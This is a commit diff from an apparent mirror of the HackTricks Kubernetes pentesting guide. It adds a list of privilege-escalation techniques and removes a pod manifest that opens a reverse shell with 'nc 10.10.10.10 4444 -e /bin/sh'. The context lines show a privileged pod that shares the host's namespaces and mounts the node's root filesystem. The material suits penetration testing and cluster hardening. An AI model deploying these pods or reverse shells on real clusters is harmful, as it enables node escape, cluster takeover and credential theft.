Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 01:17:36 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [#2964] No subject

Browse source
This commit is contained in:
CPol 2022-01-23 01:01:10 +00:00 committed by gitbook-bot
parent 00a690c27a
commit d29a543baa
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
1 changed files with 9 additions and 13 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

22
pentesting/pentesting-kubernetes/hardening-roles-clusterroles/README.md
View file

@ -4,6 +4,14 @@ Here you can find some potentially dangerous Roles and ClusterRoles configuratio
## **Privilege Escalation**
Referring as the art of getting **access to a different principal** within the cluster **with different privileges** (within the kubernetes cluster or to external clouds) than the ones you already have, in Kubernetes there are basically **4 main techniques to escalate privileges**:
* Be able to **impersonate** other user/groups/SAs with better privileges within the kubernetes cluster or to external clouds
* Be able to **create/patch/exec pods** where you can **find or attach SAs** with better privileges within the kubernetes cluster or to external clouds
* Be able to **read secrets** as the SAs tokens are stored as secrets
* Be able to **escape to the node** from a container, where you can steal all the secrets of the containers running in the node, the credentials of the node, and the permissions of the node within the cloud it's running in (if any)
* A fifth technique that deserves a mention is the ability to **run port-forward** in a pod, as you may be able to access interesting resources within that pod.
### **Access Any Resource or Verb**
This privilege provides access to **any resource with any verb**. It is the most substantial privilege that a user can get, especially if this privilege is also a “ClusterRole.” If its a “ClusterRole,” than the user can access the resources of any namespace and own the cluster with that permission.
@ -90,19 +98,6 @@ The following definition gives all the privileges a container can have:
```yaml
apiVersion: v1
kind: Pod
metadata:
name: stealetc-pod
spec:
containers:
- name: givemeyouretc
image: alpine
command: ["/bin/sh"]
args: ["-c", "nc 10.10.10.10 4444 -e /bin/sh"]
volumeMounts:
- mountPath: /mnt
name: volume
volumes:apiVersion: v1
kind: Pod
metadata:
name: ubuntu
labels:
@ -127,6 +122,7 @@ spec:
hostIPC: true # Use the host's ipc namespace https://www.man7.org/linux/man-pages/man7/ipc_namespaces.7.html
hostNetwork: true # Use the host's network namespace https://www.man7.org/linux/man-pages/man7/network_namespaces.7.html
hostPID: true # Use the host's pid namespace https://man7.org/linux/man-pages/man7/pid_namespaces.7.htmlpe_
volumes:
- name: volume
hostPath:
path: /